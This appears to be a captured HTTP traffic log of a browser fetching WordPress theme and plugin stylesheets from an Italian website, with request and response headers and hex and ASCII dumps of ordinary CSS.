2025-01-09 12:19:21 UTC	652	OUT	GET /wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-list-horizontal/style.css?ver=1 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:21 UTC	291	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:21 GMT Content-Type: text/css Content-Length: 851 Connection: close Vary: Accept-Encoding Last-Modified: Thu, 10 Dec 2020 02:53:35 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:21 UTC	851	IN	Data Raw: 2e 77 70 6d 6c 2d 6c 73 2d 6c 65 67 61 63 79 2d 6c 69 73 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 61 64 64 69 6e 67 3a 37 70 78 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 77 70 6d 6c 2d 6c 73 2d 6c 65 67 61 63 79 2d 6c 69 73 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 75 6c 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 7d 2e 77 70 6d 6c 2d 6c 73 2d 6c 65 67 61 63 79 2d 6c 69 73 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 20 2e 77 70 6d 6c 2d 6c 73 2d 69 74 65 6d 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 Data Ascii: .wpml-ls-legacy-list-horizontal{border:1px solid transparent;padding:7px;clear:both}.wpml-ls-legacy-list-horizontal>ul{padding:0;margin:0 !important;list-style-type:none}.wpml-ls-legacy-list-horizontal .wpml-ls-item{padding:0;margin:0;list-style-type:none

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:21 UTC	596	OUT	GET /wp-content/themes/enfold/config-wpml/wpml-mod.css?ver=4.5 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:21 UTC	291	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:21 GMT Content-Type: text/css Content-Length: 809 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:21 UTC	809	IN	Data Raw: 2e 61 76 69 61 5f 77 70 6d 6c 5f 6c 61 6e 67 75 61 67 65 5f 73 77 69 74 63 68 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 70 61 64 64 69 6e 67 3a 20 30 70 78 20 30 20 30 20 31 30 70 78 3b 0a 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 36 70 78 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 30 20 30 20 30 3b 0a 7a 2d 69 6e 64 65 78 3a 20 31 35 31 3b 0a 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 74 6f 70 3a 2d 32 70 78 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 2e 73 75 62 5f 6d 65 6e 75 20 75 6c 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 0a 23 74 6f 70 20 75 6c 2e 61 76 69 61 5f 77 70 Data Ascii: .avia_wpml_language_switch {position: relative;padding: 0px 0 0 10px;height: 30px;line-height: 36px;margin: 0 0 0 0;z-index: 151;-webkit-backface-visibility: hidden;top:-2px;right:0;overflow: hidden;}.sub_menu ul{float:left;}#top ul.avia_wp

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:21 UTC	590	OUT	GET /wp-content/themes/enfold/css/shortcodes.css?ver=4.5 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:21 UTC	293	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:21 GMT Content-Type: text/css Content-Length: 32116 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:21 UTC	16091	IN	Data Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 47 45 4e 45 52 49 43 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d Data Ascii: /* ======================================================================================================================================================GENERIC=============================================================================================
2025-01-09 12:19:21 UTC	16025	IN	Data Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2a 2f 0a 20 0a 20 23 74 6f 70 20 2e 61 76 2d 74 6f 67 67 6c 65 2d 73 77 69 74 63 68 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 09 0a 6f 70 61 63 69 74 79 3a 20 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 7d 20 0a 0a 20 20 0a 23 74 6f 70 20 2e 61 76 2d 74 6f 67 67 6c 65 2d 73 77 69 74 63 68 2e 61 63 74 69 76 65 7b 09 0a 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 20 61 76 69 61 2d 66 61 64 65 69 6e 20 31 73 20 31 20 65 61 73 65 2d 69 6e 3b 20 Data Ascii: ======================================================== */ #top .av-toggle-switch{display: block; margin-bottom: 10px; margin-top:10px;opacity: 0;text-align: left;} #top .av-toggle-switch.active{-webkit-animation: avia-fadein 1s 1 ease-in;

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:21 UTC	603	OUT	GET /wp-content/themes/enfold/js/aviapopup/magnific-popup.css?ver=4.5 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:22 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:22 GMT Content-Type: text/css Content-Length: 6948 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:17:10 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:22 UTC	6948	IN	Data Raw: 2f 2a 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 20 43 53 53 20 2a 2f 0a 2e 6d 66 70 2d 62 67 20 7b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 34 32 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 30 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 30 2e 38 3b 20 7d 0a 0a 2e 6d 66 70 2d 77 72 61 70 20 7b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 7a 2d 69 6e 64 65 78 Data Ascii: /* Magnific Popup CSS */.mfp-bg { top: 0; left: 0; width: 100%; height: 100%; z-index: 1042; overflow: hidden; position: fixed; background: #000; opacity: 0.8; }.mfp-wrap { top: 0; left: 0; width: 100%; height: 100%; z-index

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:22 UTC	599	OUT	GET /wp-content/uploads/dynamic_avia/enfold.css?ver=6335ddf9ba942 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:22 UTC	294	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:22 GMT Content-Type: text/css Content-Length: 163165 Connection: close Vary: Accept-Encoding Last-Modified: Thu, 29 Sep 2022 18:03:37 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:22 UTC	16090	IN	Data Raw: 0d 0a 0d 0a 3a 3a 2d 6d 6f 7a 2d 73 65 6c 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 63 39 39 63 36 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 7d 3a 3a 73 65 6c 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 63 39 39 63 36 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 7d 68 74 6d 6c 2e 68 74 6d 6c 5f 62 6f 78 65 64 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 65 65 65 65 65 20 20 20 74 6f 70 20 6c 65 66 74 20 20 6e 6f 2d 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 3b 7d 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 2c 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 64 69 76 2c 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 68 65 61 64 65 72 2c 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 6d Data Ascii: ::-moz-selection{background-color: #c99c66;color: #ffffff;}::selection{background-color: #c99c66;color: #ffffff;}html.html_boxed {background: #eeeeee top left no-repeat scroll;}.socket_color, .socket_color div, .socket_color header, .socket_color m
2025-01-09 12:19:22 UTC	16384	IN	Data Raw: 27 6e 75 6d 62 65 72 27 5d 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 75 72 6c 27 5d 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 74 65 6c 27 5d 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 73 65 61 72 63 68 27 5d 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 74 65 78 74 61 72 65 61 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 73 65 6c 65 63 74 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 31 65 31 65 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 38 66 38 66 38 3b 63 6f 6c 6f 72 3a 23 37 31 39 34 33 30 3b 7d 23 74 6f 70 20 2e 73 6f 63 6b Data Ascii: 'number'], #top .socket_color input[type='url'], #top .socket_color input[type='tel'], #top .socket_color input[type='search'], #top .socket_color textarea, #top .socket_color select{border-color:#e1e1e1;background-color: #f8f8f8;color:#719430;}#top .sock
2025-01-09 12:19:22 UTC	16384	IN	Data Raw: 6d 69 74 27 5d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 63 65 39 64 39 3b 63 6f 6c 6f 72 3a 23 37 37 34 32 31 37 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 61 63 37 62 37 3b 7d 2e 66 6f 6f 74 65 72 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 2d 74 6f 63 2d 73 74 79 6c 65 2d 65 6c 65 67 61 6e 74 20 61 2e 61 76 69 61 2d 74 6f 63 2d 6c 65 76 65 6c 2d 30 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 20 2e 66 6f 6f 74 65 72 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 2d 74 6f 63 2d 73 74 79 6c 65 2d 65 6c 65 67 61 6e 74 20 61 3a 66 69 72 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 20 2e 66 6f 6f 74 65 72 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 2d 74 6f 63 2d 73 74 79 6c 65 2d 65 6c 65 67 61 6e 74 20 61 2e 61 76 69 61 2d 74 6f Data Ascii: mit']:hover{background-color: #fce9d9;color:#774217;border-color:#dac7b7;}.footer_color .avia-toc-style-elegant a.avia-toc-level-0:last-child:after, .footer_color .avia-toc-style-elegant a:first-child:after, .footer_color .avia-toc-style-elegant a.avia-to
2025-01-09 12:19:22 UTC	16384	IN	Data Raw: 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 75 6c 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 6c 69 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 66 69 65 6c 64 73 65 74 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 66 6f 72 6d 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 6c 61 62 65 6c 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 6c 65 67 65 6e 64 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 74 61 62 6c 65 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 63 61 70 74 69 6f 6e 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 74 62 6f 64 79 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 74 66 6f 6f 74 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 Data Ascii: alternate_color ul, .alternate_color li, .alternate_color fieldset, .alternate_color form, .alternate_color label, .alternate_color legend, .alternate_color table, .alternate_color caption, .alternate_color tbody, .alternate_color tfoot, .alternate_color
2025-01-09 12:19:22 UTC	16384	IN	Data Raw: 2e 69 6e 76 65 72 73 2d 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 6e 75 6d 62 65 72 27 5d 2c 20 23 74 6f 70 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 2e 69 6e 76 65 72 73 2d 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 75 72 6c 27 5d 2c 20 23 74 6f 70 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 2e 69 6e 76 65 72 73 2d 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 74 65 6c 27 5d 2c 20 23 74 6f 70 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 2e 69 6e 76 65 72 73 2d 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 73 65 61 72 63 68 27 5d 2c 20 23 74 6f 70 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 2e 69 6e 76 65 72 73 2d 63 6f 6c 6f 72 20 74 65 78 74 61 72 65 61 2c 20 23 74 6f 70 20 Data Ascii: .invers-color input[type='number'], #top .alternate_color .invers-color input[type='url'], #top .alternate_color .invers-color input[type='tel'], #top .alternate_color .invers-color input[type='search'], #top .alternate_color .invers-color textarea, #top
2025-01-09 12:19:22 UTC	16384	IN	Data Raw: 20 23 66 66 66 66 66 66 3b 7d 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 2d 74 6f 63 2d 73 74 79 6c 65 2d 65 6c 65 67 61 6e 74 20 61 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 74 69 6d 65 6c 69 6e 65 2d 62 75 6c 6c 65 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 7d 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 74 61 62 6c 65 2c 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 77 69 64 67 65 74 5f 6e 61 76 5f 6d 65 6e 75 20 75 6c 3a 66 69 72 73 74 2d 63 68 69 6c 64 3e 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 2c 20 2e 6d 61 Data Ascii: #ffffff;}.main_color .avia-toc-style-elegant a:last-child:after{ background-color:#ffffff;}.main_color .timeline-bullet{background-color:#ffffff;border-color: #ffffff;}.main_color table, .main_color .widget_nav_menu ul:first-child>.current-menu-item, .ma
2025-01-09 12:19:23 UTC	16384	IN	Data Raw: 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 66 6f 72 6d 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 6c 61 62 65 6c 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 6c 65 67 65 6e 64 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 61 62 6c 65 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 63 61 70 74 69 6f 6e 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 62 6f 64 79 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 66 6f 6f 74 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 68 65 61 64 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 72 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 68 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 64 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 61 72 74 69 63 6c 65 2c 20 2e 68 65 61 64 65 72 5f 63 Data Ascii: header_color form, .header_color label, .header_color legend, .header_color table, .header_color caption, .header_color tbody, .header_color tfoot, .header_color thead, .header_color tr, .header_color th, .header_color td, .header_color article, .header_c
2025-01-09 12:19:23 UTC	16384	IN	Data Raw: 6e 73 69 76 65 2e 6a 73 5f 61 63 74 69 76 65 20 23 74 6f 70 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 5f 63 6f 6d 62 6f 5f 77 69 64 67 65 74 20 2e 74 6f 70 5f 74 61 62 20 2e 74 61 62 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 2e 74 65 6d 70 6c 61 74 65 2d 61 72 63 68 69 76 65 73 20 20 2e 74 61 62 63 6f 6e 74 61 69 6e 65 72 20 61 2c 20 23 74 6f 70 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 2e 74 61 62 63 6f 6e 74 61 69 6e 65 72 20 2e 74 61 62 3a 68 6f 76 65 72 2c 20 23 74 6f 70 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 2e 74 61 62 63 6f 6e 74 61 69 6e 65 72 20 2e 74 61 62 2e 61 63 74 69 76 65 5f 74 61 62 7b 63 6f 6c 6f 72 3a 23 63 39 39 63 36 36 3b 7d 20 Data Ascii: nsive.js_active #top .header_color .avia_combo_widget .top_tab .tab{border-top-color:#ffffff;}.header_color .template-archives .tabcontainer a, #top .header_color .tabcontainer .tab:hover, #top .header_color .tabcontainer .tab.active_tab{color:#c99c66;}
2025-01-09 12:19:23 UTC	16384	IN	Data Raw: 23 74 6f 70 20 2e 77 63 2d 62 6f 6f 6b 69 6e 67 73 2d 62 6f 6f 6b 69 6e 67 2d 66 6f 72 6d 20 2e 62 6c 6f 63 6b 55 49 2e 62 6c 6f 63 6b 4f 76 65 72 6c 61 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 2e 77 63 2d 62 6f 6f 6b 69 6e 67 73 2d 64 61 74 65 2d 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 74 64 2e 62 6f 6f 6b 61 62 6c 65 2d 72 61 6e 67 65 20 2e 75 69 2d 73 74 61 74 65 2d 64 65 66 61 75 6c 74 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 2e 77 63 2d 62 6f 6f 6b 69 6e 67 73 2d 64 61 74 65 2d 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 74 64 2e 75 69 2d 64 61 74 Data Ascii: #top .wc-bookings-booking-form .blockUI.blockOverlay{background-color: #ffffff !important;}#top .socket_color .wc-bookings-date-picker .ui-datepicker td.bookable-range .ui-state-default, #top .socket_color .wc-bookings-date-picker .ui-datepicker td.ui-dat
2025-01-09 12:19:23 UTC	16003	IN	Data Raw: 72 5f 70 72 6f 64 75 63 74 5f 68 65 61 64 65 72 2c 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 2d 61 72 72 6f 77 2c 20 23 74 6f 70 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 76 61 72 69 61 74 69 6f 6e 73 20 73 65 6c 65 63 74 2c 20 23 74 6f 70 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 76 61 72 69 61 74 69 6f 6e 73 20 69 6e 70 75 74 2c 20 23 74 6f 70 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 23 72 65 76 69 65 77 73 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 74 65 78 74 27 5d 2c 20 23 74 6f 70 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 23 72 65 76 69 65 77 73 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 65 6d 61 69 6c 27 5d 2c 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 23 72 65 76 69 65 77 73 20 2e 63 6f 6d 6d 65 6e 74 2d 74 65 78 74 2c 20 2e 6d 61 69 6e 5f 63 6f 6c 6f Data Ascii: r_product_header, .main_color .avia-arrow, #top .main_color .variations select, #top .main_color .variations input, #top .main_color #reviews input[type='text'], #top .main_color #reviews input[type='email'], .main_color #reviews .comment-text, .main_colo

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:22 UTC	586	OUT	GET /wp-content/themes/enfold/css/custom.css?ver=4.5 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:22 UTC	291	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:22 GMT Content-Type: text/css Content-Length: 707 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
